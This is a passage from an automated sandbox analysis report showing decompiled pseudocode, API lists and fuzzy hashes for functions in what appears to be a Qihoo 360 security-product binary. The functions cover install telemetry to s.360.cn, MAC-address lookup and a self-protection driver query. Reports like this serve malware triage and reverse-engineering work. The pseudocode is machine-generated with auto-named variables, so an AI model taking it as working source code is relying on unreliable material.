                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Service$Handle$CloseOpenVersion_memset$AddressInfoManagerModuleNativeProcQueryStatusSystem
                                                                                                                                                                                          • String ID: 360FsFlt
                                                                                                                                                                                          • API String ID: 470164251-3852983893
                                                                                                                                                                                          • Opcode ID: 2077646b87f2d650430f8be618daa1c94332ee9b1c5d9e59525fcf47f76d94a5
                                                                                                                                                                                          • Instruction ID: edf275094f30e8f9ac383ee0bd40cf0fba47fea9499fb264a7607120a8c48e6a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2077646b87f2d650430f8be618daa1c94332ee9b1c5d9e59525fcf47f76d94a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AF0CD767002586FD7247B6A9CC9DFF76BCDB48798B040035F611E2145D6509E06E5B2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CC6D05 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 99COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00CC6D05(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t31;
				intOrPtr _t35;
				intOrPtr _t41;
				void* _t47;
				intOrPtr _t53;
				void* _t58;
				void* _t63;
				void* _t80;
				void* _t83;
				short* _t85;
				void* _t86;
				signed int _t87;
				void* _t89;
				void* _t94;

				_t94 = __eflags;
				_t80 = __edx;
				_t62 = __ebx;
				_t87 = _t89 - 0x18c;
				_t31 =  *0xd64070; // 0x8a9e1774
				 *(_t87 + 0x190) = _t31 ^ _t87;
				_push(0xc);
				E00D0155A(0xd33773, __ebx, __edi, __esi);
				_t35 =  *0xd5d01c; // 0xd5d014
				_t85 =  *((intOrPtr*)(_t87 + 0x1a0));
				_t82 = 0;
				 *((intOrPtr*)(_t87 - 0x10)) = _t35;
				 *(_t87 - 4) =  *(_t87 - 4) & 0;
				 *_t87 = 0;
				E00D006A0(0, _t87 + 2, 0, 0x18e);
				E00CFF5D0(_t87, 0xc8);
				_t41 =  *0xd5d01c; // 0xd5d014
				 *((intOrPtr*)(_t87 - 0x14)) = _t41;
				 *(_t87 - 4) = 1;
				E00C9ACF3(__ebx, _t87 - 0x14, _t80, _t94, 0xb0); // executed
				if(E00CC6B21(__ebx, _t80, 0, _t94) != 0) {
					_t82 = 1;
				}
				_push( *((intOrPtr*)(_t87 - 0x14)));
				_push(_t87);
				_push( *((intOrPtr*)(_t87 + 0x19c)));
				E00C9D261(_t87 - 0x10, L"http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d", 0x3e8);
				if(_t85 != 0) {
					_t98 =  *_t85;
					if( *_t85 != 0) {
						E00C9CA59(_t87 - 0x10, "&");
						E00C9CA59(_t87 - 0x10, _t85); // executed
					}
				}
				_t47 = L00CF103F(); // executed
				E00C9B6E5(_t87 - 0x18, _t80, _t87, _t47);
				 *(_t87 - 4) = 2;
				E00C9CA59(_t87 - 0x10, L"&ver=");
				E00C98323(_t87 - 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t87 - 0x18)) - 8)),  *((intOrPtr*)(_t87 - 0x18)));
				E00C9CA59(_t87 - 0x10, L"&pid=");
				_t53 =  *0xd66ec4; // 0xd5d014
				_t23 = _t53 - 8; // 0x0
				E00C98323(_t87 - 0x10,  *_t23, _t53);
				E00CC6604(_t62, _t98,  *((intOrPtr*)(_t87 - 0x10)));
				E00C9820F(_t87 - 0x18);
				E00C9820F(_t87 - 0x14);
				_t58 = E00C9820F(_t87 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				_pop(_t83);
				_pop(_t86);
				_pop(_t63);
				return E00D0071A(_t58, _t63,  *(_t87 + 0x190) ^ _t87, _t80, _t83, _t86);
			}


















                                                                                                                                                                                          0x00cc6d05
                                                                                                                                                                                          0x00cc6d05
                                                                                                                                                                                          0x00cc6d05
                                                                                                                                                                                          0x00cc6d0c
                                                                                                                                                                                          0x00cc6d10
                                                                                                                                                                                          0x00cc6d17
                                                                                                                                                                                          0x00cc6d1d
                                                                                                                                                                                          0x00cc6d24
                                                                                                                                                                                          0x00cc6d29
                                                                                                                                                                                          0x00cc6d2e
                                                                                                                                                                                          0x00cc6d34
                                                                                                                                                                                          0x00cc6d36
                                                                                                                                                                                          0x00cc6d39
                                                                                                                                                                                          0x00cc6d44
                                                                                                                                                                                          0x00cc6d4c
                                                                                                                                                                                          0x00cc6d5d
                                                                                                                                                                                          0x00cc6d62
                                                                                                                                                                                          0x00cc6d67
                                                                                                                                                                                          0x00cc6d72
                                                                                                                                                                                          0x00cc6d76
                                                                                                                                                                                          0x00cc6d82
                                                                                                                                                                                          0x00cc6d84
                                                                                                                                                                                          0x00cc6d84
                                                                                                                                                                                          0x00cc6d86
                                                                                                                                                                                          0x00cc6d8c
                                                                                                                                                                                          0x00cc6d8d
                                                                                                                                                                                          0x00cc6da1
                                                                                                                                                                                          0x00cc6dab
                                                                                                                                                                                          0x00cc6dad
                                                                                                                                                                                          0x00cc6db1
                                                                                                                                                                                          0x00cc6dbb
                                                                                                                                                                                          0x00cc6dc4
                                                                                                                                                                                          0x00cc6dc4
                                                                                                                                                                                          0x00cc6db1
                                                                                                                                                                                          0x00cc6dc9
                                                                                                                                                                                          0x00cc6dd2
                                                                                                                                                                                          0x00cc6ddf
                                                                                                                                                                                          0x00cc6de3
                                                                                                                                                                                          0x00cc6df2
                                                                                                                                                                                          0x00cc6dff
                                                                                                                                                                                          0x00cc6e04
                                                                                                                                                                                          0x00cc6e0a
                                                                                                                                                                                          0x00cc6e10
                                                                                                                                                                                          0x00cc6e18
                                                                                                                                                                                          0x00cc6e21
                                                                                                                                                                                          0x00cc6e29
                                                                                                                                                                                          0x00cc6e31
                                                                                                                                                                                          0x00cc6e39
                                                                                                                                                                                          0x00cc6e41
                                                                                                                                                                                          0x00cc6e42
                                                                                                                                                                                          0x00cc6e43
                                                                                                                                                                                          0x00cc6e58

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CC6D24
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CC6D4C
                                                                                                                                                                                            • Part of subcall function 00CFF5D0: _memset.LIBCMT ref: 00CFF611
                                                                                                                                                                                            • Part of subcall function 00CFF5D0: _memset.LIBCMT ref: 00CFF62E
                                                                                                                                                                                            • Part of subcall function 00CFF5D0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,00000000,?), ref: 00CFF63D
                                                                                                                                                                                            • Part of subcall function 00CC6B21: _memset.LIBCMT ref: 00CC6B55
                                                                                                                                                                                            • Part of subcall function 00CC6B21: SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe,Path,?,?,?,?,?,?), ref: 00CC6B78
                                                                                                                                                                                            • Part of subcall function 00CC6B21: PathCombineW.SHLWAPI(?,?,360safe.exe,?,?,?,?), ref: 00CC6BA8
                                                                                                                                                                                            • Part of subcall function 00CC6B21: PathFileExistsW.SHLWAPI(?,?,?,?), ref: 00CC6BB2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d, xrefs: 00CC6D9B
                                                                                                                                                                                          • &pid=, xrefs: 00CC6DF7
                                                                                                                                                                                          • &ver=, xrefs: 00CC6DD7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$Path$CombineExistsFileH_prolog3Valuelstrlen
                                                                                                                                                                                          • String ID: &pid=$&ver=$http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d
                                                                                                                                                                                          • API String ID: 3972583164-2772831180
                                                                                                                                                                                          • Opcode ID: 03143ad6bf9cd576c98410a0a2e83aaa21cbde044edf61ec53be3af482286dba
                                                                                                                                                                                          • Instruction ID: 3838cb2ae47db963bcebb8b29949656ee4f7fd75094f92b8f5af8274832718b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 03143ad6bf9cd576c98410a0a2e83aaa21cbde044edf61ec53be3af482286dba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42313971900249AFDF14EFA0DD5AAEEB7B8FF14300F404419E915A72D1EB709A09DB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFEA20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00CFEA20(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				char _v264;
				signed char _v519;
				signed char _v520;
				signed char _v521;
				signed char _v522;
				signed char _v523;
				void _v524;
				void _v528;
				long _v532;
				void* __ebx;
				void* __esi;
				signed int _t20;
				void* _t25;
				int _t27;
				void* _t45;
				void* _t50;
				signed int _t51;
				signed int _t52;

				_t49 = __edi;
				_t45 = __edx;
				_t51 =  &_v532;
				_t20 =  *0xd64070; // 0x8a9e1774
				_v4 = _t20 ^ _t51;
				E00C926B0( &_v264, 0x104, "\\\\.\\%s", _a4);
				_t52 = _t51 + 0x10;
				_t36 = 0;
				_t25 = CreateFileA( &_v264, 0xc0000000, 3, 0, 3, 0, 0); // executed
				_t50 = _t25;
				if(_t50 != 0xffffffff) {
					_t46 =  &_v532;
					_v528 = 0x1010101;
					_v532 = 0;
					_t27 = DeviceIoControl(_t50, 0x170002,  &_v528, 4,  &_v524, 0x104,  &_v532, 0); // executed
					if(_t27 != 0 && _v532 > 0) {
						_push(_v519 & 0x000000ff);
						_push(_v520 & 0x000000ff);
						_push(_v521 & 0x000000ff);
						_push(_v522 & 0x000000ff);
						_t46 = _a8;
						_push(_v523 & 0x000000ff);
						E00C926B0(__edi, _a8, "%02X%02X%02X%02X%02X%02X", _v524 & 0x000000ff);
						_t52 = _t52 + 0x24;
						_t36 = 1;
					}
					FindCloseChangeNotification(_t50); // executed
					return E00D0071A(_t36, _t36, _v4 ^ _t52, _t46, _t49, _t50);
				} else {
					return E00D0071A(0, 0, _v4 ^ _t52, _t45, __edi, _t50);
				}
			}






















                                                                                                                                                                                          0x00cfea20
                                                                                                                                                                                          0x00cfea20
                                                                                                                                                                                          0x00cfea20
                                                                                                                                                                                          0x00cfea26
                                                                                                                                                                                          0x00cfea2d
                                                                                                                                                                                          0x00cfea50
                                                                                                                                                                                          0x00cfea55
                                                                                                                                                                                          0x00cfea58
                                                                                                                                                                                          0x00cfea6e
                                                                                                                                                                                          0x00cfea74
                                                                                                                                                                                          0x00cfea79
                                                                                                                                                                                          0x00cfea95
                                                                                                                                                                                          0x00cfeab1
                                                                                                                                                                                          0x00cfeab9
                                                                                                                                                                                          0x00cfeabd
                                                                                                                                                                                          0x00cfeac5
                                                                                                                                                                                          0x00cfeadc
                                                                                                                                                                                          0x00cfeae2
                                                                                                                                                                                          0x00cfeae8
                                                                                                                                                                                          0x00cfeaee
                                                                                                                                                                                          0x00cfeaef
                                                                                                                                                                                          0x00cfeaf6
                                                                                                                                                                                          0x00cfeaff
                                                                                                                                                                                          0x00cfeb04
                                                                                                                                                                                          0x00cfeb07
                                                                                                                                                                                          0x00cfeb07
                                                                                                                                                                                          0x00cfeb0d
                                                                                                                                                                                          0x00cfeb2b
                                                                                                                                                                                          0x00cfea7c
                                                                                                                                                                                          0x00cfea93
                                                                                                                                                                                          0x00cfea93

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C926B0: _vswprintf_s.LIBCMT ref: 00C926E3
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 00CFEA6E
                                                                                                                                                                                          • DeviceIoControl.KERNEL32 ref: 00CFEABD
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00CFEB0D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChangeCloseControlCreateDeviceFileFindNotification_vswprintf_s
                                                                                                                                                                                          • String ID: %02X%02X%02X%02X%02X%02X$\\.\%s
                                                                                                                                                                                          • API String ID: 158759712-1525991222
                                                                                                                                                                                          • Opcode ID: 6ffa27b84e33fcae6a78fded8be0b2d7f213789ff83efc5545da1ec168d1ee22
                                                                                                                                                                                          • Instruction ID: 55a6532b7e85392ba8b99b95803d7acb6d98fdf1326b21510ab0ee2b089355a2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffa27b84e33fcae6a78fded8be0b2d7f213789ff83efc5545da1ec168d1ee22
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A21B7B11083546FD324EB689C89FFB7BECAB88714F44491DB6E9821D1D6789A04CB73
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8DFE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E00C8DFE0() {
				long _v4;
				void _v8;
				void _v12;
				void* _t8;
				signed int _t10;
				void* _t16;

				_v8 = GetCurrentProcessId();
				_v12 = 0;
				_t8 = CreateFileW(L"\\\\.\\360SelfProtection", 0x80, 3, 0, 3, 0, 0); // executed
				_t16 = _t8;
				if(_t16 != 0xffffffff) {
					_t10 = DeviceIoControl(_t16, 0x22204c,  &_v8, 4,  &_v12, 4,  &_v4, 0);
					CloseHandle(_t16);
					asm("sbb esi, esi");
					return  ~_t10 & _v12;
				} else {
					return 0;
				}
			}









                                                                                                                                                                                          0x00c8dffe
                                                                                                                                                                                          0x00c8e002
                                                                                                                                                                                          0x00c8e00a
                                                                                                                                                                                          0x00c8e010
                                                                                                                                                                                          0x00c8e015
                                                                                                                                                                                          0x00c8e03a
                                                                                                                                                                                          0x00c8e043
                                                                                                                                                                                          0x00c8e04b
                                                                                                                                                                                          0x00c8e058
                                                                                                                                                                                          0x00c8e017
                                                                                                                                                                                          0x00c8e01d
                                                                                                                                                                                          0x00c8e01d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseControlCreateCurrentDeviceFileHandleProcess
                                                                                                                                                                                          • String ID: \\.\360SelfProtection
                                                                                                                                                                                          • API String ID: 3778458602-936859468
                                                                                                                                                                                          • Opcode ID: e60bddedcd1897e92bd0251be70868c184e0c810bff2af8a1e13cf5e1fc8e05d
                                                                                                                                                                                          • Instruction ID: 1c0189b066926785aeafc38752e56118eb37de93ff2c15e6f3dffdf24613ea1c
                                                                                                                                                                                          • Opcode Fuzzy Hash: e60bddedcd1897e92bd0251be70868c184e0c810bff2af8a1e13cf5e1fc8e05d
                                                                                                                                                                                          • Instruction Fuzzy Hash: C0F0A9327443107BD210979CEC06F6E77A4AB85F15F440618F7D4E71D0D7B4560887A7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CAE0F4 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E00CAE0F4(void* __ebx, void* __edx, void* __edi) {
				void* __esi;
				signed int _t23;
				signed int _t39;
				void* _t43;
				void* _t48;
				void* _t52;
				signed int _t53;
				void* _t55;

				_t49 = __edi;
				_t48 = __edx;
				_t43 = __ebx;
				_t53 = _t55 - 0x1fa4;
				E00D00E90(0x2024);
				_t23 =  *0xd64070; // 0x8a9e1774
				 *(_t53 + 0x1fa0) = _t23 ^ _t53;
				_t51 =  *((intOrPtr*)(_t53 + 0x1fac));
				if( *((intOrPtr*)(_t53 + 0x1fac)) != 0) {
					E00D006A0(__edi, _t53 - 0x80, 0, 0x1e);
					 *((intOrPtr*)(_t53 - 0x7c)) = 3;
					E00D006A0(_t49, _t53 - 0x60, 0, 0x2000);
					E00D01877(_t48, _t53 - 0x60, 0x1000, _t51, 0x1000);
					 *((short*)(_t53 + E00D00EBB(_t53 - 0x60) * 2 - 0x60)) = 0;
					 *((short*)(_t53 + E00D00EBB(_t53 - 0x60) * 2 - 0x5e)) = 0;
					 *((intOrPtr*)(_t53 - 0x78)) = _t53 - 0x60;
					 *((short*)(_t53 - 0x70)) = 0x614;
					_t39 = SHFileOperationW(_t53 - 0x80); // executed
					asm("sbb eax, eax");
					_t41 =  ~_t39 + 1;
				} else {
					_t41 = 0;
				}
				_pop(_t52);
				return E00D0071A(_t41, _t43,  *(_t53 + 0x1fa0) ^ _t53, _t48, _t49, _t52);
			}











                                                                                                                                                                                          0x00cae0f4
                                                                                                                                                                                          0x00cae0f4
                                                                                                                                                                                          0x00cae0f4
                                                                                                                                                                                          0x00cae0f5
                                                                                                                                                                                          0x00cae101
                                                                                                                                                                                          0x00cae106
                                                                                                                                                                                          0x00cae10d
                                                                                                                                                                                          0x00cae114
                                                                                                                                                                                          0x00cae11c
                                                                                                                                                                                          0x00cae12a
                                                                                                                                                                                          0x00cae13a
                                                                                                                                                                                          0x00cae141
                                                                                                                                                                                          0x00cae152
                                                                                                                                                                                          0x00cae162
                                                                                                                                                                                          0x00cae172
                                                                                                                                                                                          0x00cae17a
                                                                                                                                                                                          0x00cae182
                                                                                                                                                                                          0x00cae18d
                                                                                                                                                                                          0x00cae195
                                                                                                                                                                                          0x00cae197
                                                                                                                                                                                          0x00cae11e
                                                                                                                                                                                          0x00cae11e
                                                                                                                                                                                          0x00cae11e
                                                                                                                                                                                          0x00cae1a0
                                                                                                                                                                                          0x00cae1ad

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CAE12A
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CAE141
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00CAE15B
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00CAE16B
                                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,00CED1DC,00000000,00000000,?,?,?,?,?,?), ref: 00CAE18D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset_wcslen$FileOperation
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1469800647-0
                                                                                                                                                                                          • Opcode ID: 31e9da2a74a819a6bc858a1a8e78ca00676a2bf90728956be913d5b0b976e19a
                                                                                                                                                                                          • Instruction ID: 53519e23b9ce76f7d816eebeb5aec99ae294b316a36859df048e838d0332ed73
                                                                                                                                                                                          • Opcode Fuzzy Hash: 31e9da2a74a819a6bc858a1a8e78ca00676a2bf90728956be913d5b0b976e19a
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2115E71A1031D6ADB21EFB8DC49BEE77ADEF08300F500929B50DE7281DB7895048B75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00D0092B Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 32%
                                                                                                                                                                                          			E00D0092B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0xd58a38);
				_t8 = E00D009BC(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E00D00A01(_t8);
				}
				if( *0xd6a1c0 != 3) {
					_push(_t24);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0xd6842c); // executed
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E00D05D61(_t32);
						 *_t10 = E00D05D1F(GetLastError());
					}
					goto L9;
				}
				E00D0EFCA(__ebx, __edi, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00D0F0F9(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E00D0F129();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E00D00981();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}







                                                                                                                                                                                          0x00d0092b
                                                                                                                                                                                          0x00d0092d
                                                                                                                                                                                          0x00d00932
                                                                                                                                                                                          0x00d00937
                                                                                                                                                                                          0x00d0093c
                                                                                                                                                                                          0x00d009b3
                                                                                                                                                                                          0x00d009b8
                                                                                                                                                                                          0x00d009b8
                                                                                                                                                                                          0x00d00945
                                                                                                                                                                                          0x00d0098a
                                                                                                                                                                                          0x00d0098b
                                                                                                                                                                                          0x00d0098b
                                                                                                                                                                                          0x00d00993
                                                                                                                                                                                          0x00d00999
                                                                                                                                                                                          0x00d0099b
                                                                                                                                                                                          0x00d0099d
                                                                                                                                                                                          0x00d009b0
                                                                                                                                                                                          0x00d009b2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00d0099b
                                                                                                                                                                                          0x00d00949
                                                                                                                                                                                          0x00d0094f
                                                                                                                                                                                          0x00d00954
                                                                                                                                                                                          0x00d0095a
                                                                                                                                                                                          0x00d0095f
                                                                                                                                                                                          0x00d00961
                                                                                                                                                                                          0x00d00962
                                                                                                                                                                                          0x00d00963
                                                                                                                                                                                          0x00d00969
                                                                                                                                                                                          0x00d0096a
                                                                                                                                                                                          0x00d00971
                                                                                                                                                                                          0x00d0097a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00d0097c
                                                                                                                                                                                          0x00d0097c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00d0097c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __lock.LIBCMT ref: 00D00949
                                                                                                                                                                                            • Part of subcall function 00D0EFCA: __mtinitlocknum.LIBCMT ref: 00D0EFE0
                                                                                                                                                                                            • Part of subcall function 00D0EFCA: __amsg_exit.LIBCMT ref: 00D0EFEC
